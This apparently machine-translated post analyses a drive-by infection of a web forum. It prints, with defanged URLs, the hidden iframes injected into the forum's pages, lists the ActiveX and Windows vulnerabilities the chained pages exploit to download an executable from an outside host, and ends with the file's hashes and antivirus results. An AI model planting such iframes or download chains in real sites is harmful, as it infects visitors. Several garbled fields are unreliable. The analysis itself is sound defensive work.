A forum is infected with worm. win32.autorun. eyh

A forum is infected with worm. win32.autorun. eyh

The forum page contains code:
/---
<IFRAME width = '0' Height = '0' src = 'hxxp: // www.5 ** 4 * z ** c.cn/1*%7aq/q.js'> </iframe>
---/

Hxxp: // www.5 ** 4 * z ** c.cn/1*%7aq/q.js
Output code:
/---
<IFRAME src = "hxxp: // M **. SF * S3 ** wws.cn/03/x4.htm" width = 1 Height = 0> </iframe>

Hxxp: // M **. SF * S3 ** wws.cn/03/x4.htm
Code included:
/---
<IFRAME src=google.htm width = 100 Height = 0> </iframe>
---/

Hxxp: // M **. SF * S3 ** wws.cn/03/google.htm
A previously unknown encryption method is used. The first part of the code is:
/---
<HTML> ---/

Its function is to check the browser software. If it is an Internet browser, ie.swf is displayed, and ff.swf is displayed if it is negative. Then, the code is output:
/---
<IFRAME src1_all.htm width = 100 Height = 0> </iframe>
---/

Hxxp: // M **. SF * S3 ** wws.cn/03/all.htm

The same encryption method is used:
Use <IFRAME> to introduce the following web pages and use the vulnerability to download hxxp: // d1.csygg.com/01/g.exe:

1. htm

Exploiting MS-06014 Vulnerabilities

Kdosn.htm
Leverage the qvod player (CLSID: F3D0D36F-23F8-4682-A195-74C92B03D4AF) Vulnerability

Kc.htm
Download hxxp: // d1.csygg.com/01/baidu.cab by using the Baidu tool bar (CLSID: {A7F05EE4-0426-454F-8013-C41E3596E9E9}) Vulnerability

Newlz.htm
Exploiting the lizing (gliedown. iedown.1, CLSID: F917534D-535B-416B-8E8F-0C04756C31A8) Vulnerability

S.htm
Use Sina (Downloader. dloader.1, CLSID: 78abdc59-d8e7-44d3-9a76-9a0918c52b4a) Vulnerability

Office.htm
Using the MS Office (snpvw. Snapshot Viewer control.1) Vulnerability

Bf.htm
Use storm audio and video (MPs. stormplayer,) Vulnerabilities

Cx.htm
Use the superstar scanner (pdg2) Vulnerability

Uu.htm
Uusee network TV (uuupgrade. uuupgradectrl.1) Vulnerability

2. htm
Exploiting the hangameplugincn18.hangameplugincn18.1 Vulnerability

3. htm
4. htm
Use RealPlayer (ierpctl. ierpctl.1) Vulnerability

0. htm
Exploitation (CLSID: 19effc12-25fb-479a-a0f2-1569ae1b3365) Vulnerability

5. htm
Exploiting MS09-002 Vulnerabilities

File Description: D:/test/g.exe
Attribute: ---
Digital Signature: No
PE file: Yes
An error occurred while obtaining the file version information!
Creation Time: 22:38:20
Modification time: 22:38:20
Size: 25696 bytes, 25.96 KB
MD5: cae3e537b9d4495d31af6c360cb31dee
Sha1: 76877278ef76318e4a025adc9b9fec8cf8c7d30c
CRC32: 3ee9304b

 

Anti-Virus engine	Version	Last update	Scan results
A-squared	4.0.0.101	2009.03.23	Win32.warezov! Ik
AhnLab-V3	5.0.0.2	2009.03.23	Packed/upack
AntiVir	7.9.0.120	2009.03.23	TR/crypt. upkm. gen
Authentium	5.1.2.4	2009.03.23	W32/systroj. N. Gen! Eldorado
Avast	4.8.1335.0	2009.03.23	-
AVG	8.5.0.283	2009.03.23	Rootkit-Agent.BN
BitDefender	7.2	2009.03.23	Generic. malware. SP! BPK! TKG. be60b47d
Cat-quickheal	10.00	2009.03.23	-
ClamAV	0.94.1	2009.03.23	Worm. Mytob-73
Comodo	1082	2009.03.23	-
Drweb	4.44.0.09170	2009.03.23	Dloader. Trojan
Esafe	7.0.20.	2009.03.23	Win32.looked. gen
ETrust-vet	31.6.6412	2009.03.23	-
F-Prot	4.4.4.56	2009.03.23	W32/systroj. N. Gen! Eldorado
F-Secure	8.0.14470.0	2009.03.23	Trojan. win32.agent2. gcy
Fortinet	3.117.0.0	2009.03.23	-
Gdata	19	2009.03.23	Generic. malware. SP! BPK! TKG. be60b47d
Ikarus	T3.1.1.48.0	2009.03.23	Win32.warezov
K7antivirus	7.10.678	2009.03.21	Generic. Packed. Upack-1
Kaspersky	7.0.0.125	2009.03.23	Trojan. win32.agent2. gcy
McAfee	5561	2009.03.22	-
McAfee + Artemis	5561	2009.03.22	New malware. f
McAfee-GW-Edition	6.7.6	2009.03.23	Trojan. crypt. upkm. gen
Microsoft	1.4502	2009.03.23	-
NOD32	3953	2009.03.21	-
Norman	6.00.06	2009.03.23	W32/suspicious_u.gen
Nprotect	2009.1.8.0	2009.03.23	-
Panda	10.0.0.10	2009.03.22	-
Pctools	4.4.2.0	2009.03.23	Packed/upack
Prevx1	V2	2009.03.23	High risk Worm
Rising	21.22.02.00	2009.03.23	Worm. win32.autorun. eyh
Sophos	4.39.0	2009.03.23	Mal/packer
Sunbelt	3.2.1858.2	2009.03.22	-
Symantec	1.4.4.12	2009.03.23	Trojan. killav
Thehacker	6.3.3.4.287	2009.03.23	-
TrendMicro	8.700.0.1004	2009.03.23	Cryp_upack
Vba32	3.12.10.1	2009.03.23	-
ViRobot	2009.3.23.1660	2009.03.23	-
Virusbuster	4.6.5.0	2009.03.22	Packed/upack
Additional information
File Size: 25696 bytes
Md5...: cae3e537b9d4495d31af6c360cb31dee
Sha1..: 76877278ef76318e4a025adc9b9fec8cf8c7d30c
Sha256: sha256
Sha512: e49b97f98091ab44e4e89152db963aba30fa671238d735efca54259bb970550 <br> then
Ssdeep: 384: b5jocon1ffccinu9mg1_hy + qvmf6mfjt6unhqjnx8cw02igc8telalvr7l: B <br> 4co7ykjvxfjc7n2igptelavr <br>
Peid ..: upack 0.24-0.27 beta/0.28 alpha-& gt; Dwing
TRID ..: file type identification <br> dos executable generic (100.0%)
Peinfo: PE Structure Information <br> (base data) <br> entrypointaddress.: 0x1efe3 <br> timedatestamp .....: 0x0 (Thu Jan 01 00:00:00 1970) <br> machinetype .......: 0x14c (i386) <br> (2 sections) <br> name viradd virsiz rawdsiz ntrpy MD5 <br>. upack 0x1000 0x18000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e <br>. rsrc 0x19000 0xe000 0x6260 7.98 88e69c0ef43413739c008ef9e7337308 <br> (1 Imports) <br> & gt; kernel32.dll: loadlibrarya, getprocaddress <br> (0 exports) <br>
Prevx info: & lt; a href = 'HTTP: // info.prevx.com/aboutprogramtext.asp? Px5 = 2480bffb6039ec60640200dbb987a400c935bb45 'target = '_ blank' & gt; http://info.prevx.com/aboutprogramtext.asp? Px5 = 2480bffb6039ec60640200dbb987a400c935bb45 & lt;/A & gt;
Packers (Kaspersky): upack
Packers (authentium): embedded
Packers (F-Prot): embedded